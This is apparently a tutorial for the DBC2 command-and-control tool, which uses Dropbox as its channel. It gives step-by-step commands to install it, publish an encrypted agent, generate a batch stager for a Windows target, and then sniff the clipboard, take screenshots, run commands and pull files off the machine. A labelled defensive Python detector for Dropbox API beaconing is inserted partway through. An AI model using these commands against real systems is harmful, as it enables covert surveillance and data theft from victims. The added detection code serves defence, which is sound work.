In this article, we will learn how to use the DropboxC2 tool, also known as DBC2.
Table of Contents:
Introduction
Installation
Getting Dropbox API
Exploiting Target
Clipboard Sniffing
Capturing Screenshot
Command Execution
File Download
Introduction
DBC2 is primarily a post-exploitation tool. It consists of an agent running on the target’s machine, a controller running on any machine, PowerShell modules, and the Dropbox servers as the means of communication. It is inspired by the PowerShell Empire framework and is developed in Python. The credit for developing this tool goes to Arno0x0x.
For this particular demonstration:
Attacker: Kali Linux
Target: Windows 10
Installation
To begin, we need the tool on our attacker machine. To do this, we will clone the tool directly from GitHub.
git clone https://github.com/Arno0x/DBC2
After running the above command, we have a directory named DBC2. Now we move into that directory using the cd command. After that, we need to install the dependencies of the tool. There are multiple ways to do this, but here we use the pip command along with the requirements.txt file that we cloned from git earlier.
cd DBC2/
pip install -r requirements.txt
Getting Dropbox API
This tool uses the Dropbox servers as the medium to run agents on the target machine. To do that, it requires the Dropbox API. To get it, first create an account on Dropbox.
Then, after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then, in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on the Create App button to proceed.
This will lead to another webpage as shown below. Here, move on to the OAuth 2 section and generate an access token. This gives us the Dropbox API access token required for this particular practical.
Copy the generated access token, then go to the directory we cloned earlier. Here we have a file named config.py. We will open it using the nano command and paste the access token as the value for “defaultAccessToken”, as shown in the screenshot given below.
Exploiting Target
Now it’s time to run the tool. Check that it has the appropriate permissions before running it. As we run the tool, we are greeted with a cool-looking banner as shown in the image given below, followed by some details about the author, the version and the tool. After this, it asks for a master password, which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add it to the config.py file so that it doesn’t ask for a master password again. After this, it creates an incoming directory inside the directory we cloned earlier. This will be used as a buffer to save files from the target.
python dropboxC2.py
This tool requires the modules and stager to be uploaded to Dropbox before proceeding further. We will do this using the command given below.
publishStage dbc2_agent.exe
This will upload a file to Dropbox as shown in the image given below. This file is encrypted using XOR encryption.
Now let’s check if the stage is published using the command given below:
listPublishedStage
Now that the stage is uploaded, let’s use it to create a stager. We are going to create a batch file, but many other types of stager are available. This tool provides stagers as macro, oneliner, JavaScript, MSBuild, sct and many more. This command will create a stager.bat in the tmp directory. We then send this bat file to our target machine.
genStager batch default
After the batch file is executed on the target machine, we are informed by a message on the terminal that an agent was found, along with its ID. Now we will use the list command to see the list of agents. Then we will copy the AgentID and use it to interact with the session as shown in the given image.
list
use [AgentID]
This will create a file on Dropbox with the .status extension as shown in the given image.
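Because the agent and the controller only ever talk to the Dropbox servers, network monitoring has to key on which process contacts the Dropbox API rather than on the destination alone. The following is an added example, not part of the original article or of the DBC2 project: it flags non-allowlisted processes that query Dropbox API hostnames and checks whether their requests are evenly spaced. The CSV log format, the allowlisted client path, the host names and the thresholds are assumptions, and the log lines are constructed.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Hostnames of the Dropbox HTTP API.
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
# Assumption: the only sanctioned Dropbox client binary in this environment.
ALLOWED_IMAGES = {r"c:\program files (x86)\dropbox\client\dropbox.exe"}

# Constructed sample: per-process DNS query records exported as CSV.
SAMPLE_LOG = r"""time,host,image,query
2024-01-10T09:00:00,WS-01,C:\Program Files (x86)\Dropbox\Client\Dropbox.exe,api.dropboxapi.com
2024-01-10T09:00:10,WS-02,C:\Users\alice\AppData\Local\Temp\updater.exe,content.dropboxapi.com
2024-01-10T09:00:20,WS-02,C:\Users\alice\AppData\Local\Temp\updater.exe,api.dropboxapi.com
2024-01-10T09:00:31,WS-02,C:\Users\alice\AppData\Local\Temp\updater.exe,content.dropboxapi.com
2024-01-10T09:00:40,WS-02,C:\Users\alice\AppData\Local\Temp\updater.exe,api.dropboxapi.com
2024-01-10T09:00:50,WS-02,C:\Users\alice\AppData\Local\Temp\updater.exe,content.dropboxapi.com
2024-01-10T09:03:00,WS-03,C:\Program Files\Google\Chrome\Application\chrome.exe,www.dropbox.com
2024-01-10T09:05:00,WS-04,C:\Tools\backup.exe,api.dropboxapi.com
"""


def find_suspect_dropbox_clients(log_text, min_events=4, max_jitter_s=5.0):
    """Map (host, image) -> stats for non-allowlisted processes using the Dropbox API."""
    seen = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["query"].lower() not in DROPBOX_API_HOSTS:
            continue  # browser traffic to www.dropbox.com etc. is out of scope
        image = row["image"].lower()
        if image in ALLOWED_IMAGES:
            continue  # the real Dropbox client is expected to call the API
        seen[(row["host"], image)].append(datetime.fromisoformat(row["time"]))

    findings = {}
    for key, times in seen.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Near-constant gaps between requests suggest an automated polling loop.
        beaconing = len(times) >= min_events and pstdev(gaps) <= max_jitter_s
        findings[key] = {"events": len(times), "beaconing": beaconing}
    return findings


if __name__ == "__main__":
    for (host, image), info in find_suspect_dropbox_clients(SAMPLE_LOG).items():
        print(host, image, info)
```

A single hit, such as the constructed backup utility on WS-04, is only a lead to triage; the evenly spaced requests from an unexpected binary on WS-02 are the stronger signal.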
Clipboard Sniffing
We can get the data that the target has on its clipboard, that is, the data he/she has copied. To do this, we start a sniffer using the command clipboardLogger start, then wait until the target copies some data. Then we stop the sniffer using the command clipboardLogger stop. After the sniffer is stopped, the clipboard contents are saved in a text file inside the incoming directory.
clipboardLogger start
clipboardLogger stop
Let’s take a look at what the target copied on his/her machine. We are going to use the cat command in a new Kali terminal to read the file as shown in the given image.
cat /root/DBC2/incoming/clipboardlogger.txt
Capturing Screenshot
Furthermore, we can grab a screenshot of the target machine. To do this, we will use the screenshot command as shown in the given image.
screenshot
The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.
Command Execution
We can run PowerShell commands on the target machine using the cmd parameter. This tool doesn’t offer a shell, but it can execute one command at a time. So we type cmd, and it then asks for the command to be executed. Here we run the command dir, and we get the list of files as shown in the given image.
cmd
dir
File Download
Furthermore, we can download files from the target. To do this, we use the command getFile followed by the file name or path. This will download the file from the target to our attacker machine.
getFile sharetext.txt
The tool will download the file into the incoming directory we discussed earlier. We can view the file using the cat command as shown in the image given below.
cat /root/DBC2/incoming/sharetext.txt